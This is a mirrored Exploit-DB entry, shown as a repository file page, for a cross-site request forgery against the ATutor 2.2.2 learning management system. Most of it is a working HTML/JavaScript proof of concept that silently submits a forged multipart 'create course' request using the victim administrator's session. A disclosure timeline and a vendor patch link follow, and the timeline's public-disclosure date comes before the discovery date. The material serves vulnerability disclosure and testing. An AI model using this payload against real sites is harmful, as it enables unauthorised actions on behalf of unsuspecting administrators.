bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/40755.html
Offensive Security d63de06c7a DB: 2022-11-10 
2776 changes to exploits/shellcodes/ghdb
2022-11-10 16:39:50 +00:00

216 lines
No EOL
9 KiB
HTML
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Exploit Title: ATutor_2.2.2 Learning Management System
# Cross-Site Request Forgery (Add New Course)
# Date: 13-11-2016
# Software Link: https://github.com/atutor/ATutor/releases/tag/atutor_2_2_2
# Vendor: http://www.atutor.ca/
# Exploit Author: Saravana Kumar
# Contact: https://facebook.com/06saravanakumar
# Category: webapps
# Version: 2.2.2
# Platform: PHP
# Tested on: [Kali Linux 2.0 | Windows 7]
# Email: 06saravanakumar@gmail.com
# Affected URL:
http://localhost/ATutor/mods/_core/courses/users/create_course.php
==================================
Vulnerability Disclosure Timeline:==================================2016-11-07: Found the vulnerability and Reported to Vendor.2016-11-08: Vendor Replied.2016-11-10: Vendor Fixed the vulnerability.2016-11-11: Patch released2016-10-12: Public Disclosure
########################### CSRF PoC ###############################
<html>
<------ CSRF POC ------>
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://localhost/ATutor/mods/_core/courses/users/create_course.php", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------34481053430281");
xhr.withCredentials = true;
var body = "-----------------------------34481053430281\r\n" +
"Content-Disposition: form-data; name=\"form_course\"\r\n" +
"\r\n" +
"true\r\n" +
"-----------------------------34481053430281\r\n" +
"Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n" +
"\r\n" +
"819200\r\n" +
"-----------------------------34481053430281\r\n" +
"Content-Disposition: form-data; name=\"course\"\r\n" +
"\r\n" +
"0\r\n" +
"-----------------------------34481053430281\r\n" +
"Content-Disposition: form-data; name=\"old_access\"\r\n" +
"\r\n" +
"protected\r\n" +
"-----------------------------34481053430281\r\n" +
"Content-Disposition: form-data; name=\"created_date\"\r\n" +
"\r\n" +
"2016-11-07 06:55:20\r\n" +
"-----------------------------34481053430281\r\n" +
"Content-Disposition: form-data; name=\"show_courses\"\r\n" +
"\r\n" +
"0\r\n" +
"-----------------------------34481053430281\r\n" +
"Content-Disposition: form-data; name=\"current_cat\"\r\n" +
"\r\n" +
"0\r\n" +
"-----------------------------34481053430281\r\n" +
"Content-Disposition: form-data; name=\"title\"\r\n" +
"\r\n" +
"Programming Language\r\n" +
"-----------------------------34481053430281\r\n" +
"Content-Disposition: form-data; name=\"pri_lang\"\r\n" +
"\r\n" +
"en\r\n" +
"-----------------------------34481053430281\r\n" +
"Content-Disposition: form-data; name=\"description\"\r\n" +
"\r\n" +
"Python\r\n" +
"-----------------------------34481053430281\r\n" +
"Content-Disposition: form-data; name=\"category_parent\"\r\n" +
"\r\n" +
"0\r\n" +
"-----------------------------34481053430281\r\n" +
"Content-Disposition: form-data; name=\"content_packaging\"\r\n" +
"\r\n" +
"top\r\n" +
"-----------------------------34481053430281\r\n" +
"Content-Disposition: form-data; name=\"rss\"\r\n" +
"\r\n" +
"0\r\n" +
"-----------------------------34481053430281\r\n" +
"Content-Disposition: form-data; name=\"access\"\r\n" +
"\r\n" +
"protected\r\n" +
"-----------------------------34481053430281\r\n" +
"Content-Disposition: form-data; name=\"release_date\"\r\n" +
"\r\n" +
"0\r\n" +
"-----------------------------34481053430281\r\n" +
"Content-Disposition: form-data; name=\"day_release\"\r\n" +
"\r\n" +
"1\r\n" +
"-----------------------------34481053430281\r\n" +
"Content-Disposition: form-data; name=\"month_release\"\r\n" +
"\r\n" +
"1\r\n" +
"-----------------------------34481053430281\r\n" +
"Content-Disposition: form-data; name=\"year_release\"\r\n" +
"\r\n" +
"2016\r\n" +
"-----------------------------34481053430281\r\n" +
"Content-Disposition: form-data; name=\"hour_release\"\r\n" +
"\r\n" +
"0\r\n" +
"-----------------------------34481053430281\r\n" +
"Content-Disposition: form-data; name=\"min_release\"\r\n" +
"\r\n" +
"0\r\n" +
"-----------------------------34481053430281\r\n" +
"Content-Disposition: form-data; name=\"end_date\"\r\n" +
"\r\n" +
"0\r\n" +
"-----------------------------34481053430281\r\n" +
"Content-Disposition: form-data; name=\"day_end\"\r\n" +
"\r\n" +
"1\r\n" +
"-----------------------------34481053430281\r\n" +
"Content-Disposition: form-data; name=\"month_end\"\r\n" +
"\r\n" +
"1\r\n" +
"-----------------------------34481053430281\r\n" +
"Content-Disposition: form-data; name=\"year_end\"\r\n" +
"\r\n" +
"2017\r\n" +
"-----------------------------34481053430281\r\n" +
"Content-Disposition: form-data; name=\"hour_end\"\r\n" +
"\r\n" +
"0\r\n" +
"-----------------------------34481053430281\r\n" +
"Content-Disposition: form-data; name=\"min_end\"\r\n" +
"\r\n" +
"0\r\n" +
"-----------------------------34481053430281\r\n" +
"Content-Disposition: form-data; name=\"setvisual\"\r\n" +
"\r\n" +
"1\r\n" +
"-----------------------------34481053430281\r\n" +
"Content-Disposition: form-data; name=\"banner\"\r\n" +
"\r\n" +
"\x3cp\x3eCan fill content what ever you want.\x3c/p\x3e\r\n" +
"-----------------------------34481053430281\r\n" +
"Content-Disposition: form-data; name=\"initial_content\"\r\n" +
"\r\n" +
"1\r\n" +
"-----------------------------34481053430281\r\n" +
"Content-Disposition: form-data; name=\"quota\"\r\n" +
"\r\n" +
"-2\r\n" +
"-----------------------------34481053430281\r\n" +
"Content-Disposition: form-data; name=\"filesize\"\r\n" +
"\r\n" +
"-3\r\n" +
"-----------------------------34481053430281\r\n" +
"Content-Disposition: form-data; name=\"tracking\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------34481053430281\r\n" +
"Content-Disposition: form-data; name=\"copyright\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------34481053430281\r\n" +
"Content-Disposition: form-data; name=\"boolForce\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------34481053430281\r\n" +
"Content-Disposition: form-data; name=\"icon\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------34481053430281\r\n" +
"Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n" +
"\r\n" +
"819200\r\n" +
"-----------------------------34481053430281\r\n" +
"Content-Disposition: form-data; name=\"customicon\"; filename=\"\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------34481053430281\r\n" +
"Content-Disposition: form-data; name=\"custOptCount\"\r\n" +
"\r\n" +
"0\r\n" +
"-----------------------------34481053430281\r\n" +
"Content-Disposition: form-data; name=\"courseId\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------34481053430281\r\n" +
"Content-Disposition: form-data; name=\"submit\"\r\n" +
"\r\n" +
"Save\r\n" +
"-----------------------------34481053430281--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>
---------------------------------------------------------------------------
Solution:
Patch is available. Install patch using the ATutor Patcher.
Link to download patch:
http://update.atutor.ca/patch/2_2_2/2_2_2-6/patch.xml
---------------------------------------------------------------------------
Reference in a new issue View git blame Copy permalink